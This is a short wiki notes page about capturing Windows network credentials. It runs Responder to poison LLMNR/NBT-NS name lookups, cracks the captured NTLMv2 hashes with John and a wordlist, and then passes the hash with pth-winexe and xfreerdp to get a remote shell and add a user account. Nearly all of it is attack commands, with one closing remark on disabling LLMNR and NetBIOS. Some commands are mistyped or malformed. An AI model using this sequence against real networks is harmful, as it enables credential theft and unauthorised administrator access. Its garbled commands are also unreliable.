cyberdocs:pass_the_hash_using_responder_and_john
RESPONDER #cd /usr/share/responder/ #python Responder.py -i 192.168.1.50 -I eth0 Simulate a user typing the wrong SMB server name using SNARE01 instead of SHARE01 Error is returned to the client machine from Responder.py that windows can not access it. #cd logs/ ls (to comfirm if hash log file is created JOHN #john SMBv2-NTLMv2-SSP-192.168.1.8.txt John hash2.txt - -wordlist=/root/Desktop/rockyou.txt John - -show hash2.txt John - -show =hash2.txt Cat john.pot john hh.txt - -wordlist=/root/Desktop/rockyou.txt john hh.txt - -show cd ~/.john Cd ~ Cd .john PASS the HASH Cd pth-toolkit-master/ ./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 cmd ./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 ‘net user a a /add’ pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8 *How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks* The good news is this attack is fairly easy to prevent. Note, that both LLMNR and NetBIOS Name Service need to be disabled, if you only disable LLMNR then Windows will failover to NetBIOS Name Server for resolution
cyberdocs/pass_the_hash_using_responder_and_john.txt · Last modified: 2019/02/06 13:03 by dardan